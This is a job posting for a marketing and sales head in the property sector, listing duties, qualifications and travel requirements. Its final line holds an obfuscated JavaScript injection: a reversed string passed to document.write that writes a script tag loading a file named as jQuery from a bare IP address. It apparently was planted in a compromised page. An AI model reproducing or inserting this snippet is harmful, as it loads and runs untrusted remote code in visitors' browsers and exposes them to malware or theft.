Industry : Property
– Oversees and leads the development and execution of marketing and sales plans, sales administration, credit control and customer care services, including strategies, tactics and resources to achieve Company goals and objectives (i.e. diversity, capture market share, create distinctiveness, build brand, sales targets, profitability, etc.)
– Develops and recommends product positioning, packaging and pricing strategy.
– Prepares, reviews, analyzes and controls expenditures of division to conform to budgetary requirements.
– Guides the preparation of periodic marketing and sales reports and presents/submits to the executive management and board of directors.
– Leads the effort to conduct market research/reconnaissance and assess markets and customers including market trends, customer segments, risk management and other factors or internal/external issues that affect the Company’s strategies.
– Builds, develops, manages, trains, motivates and retains a marketing and sales team capable of developing and executing marketing and sales strategies, plans and sales administration including customer account management process.
– Develops and maintains appropriate external relationships, negotiates and closes deals with customers/purchases, business contacts and authorities.
– Provides input and support on the development, innovation and realization of new products to meet the market needs.
– Candidates should possess a Degree or Diploma in Marketing, Business or relevant.
– Minimum 5 years experience in related industry and experience in managing a team.
– Matured, enthusiastic and proactive.
– Possess own transport.
– Willing to travel to PJ fortnightly.
– Senior Execs are welcome to apply document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))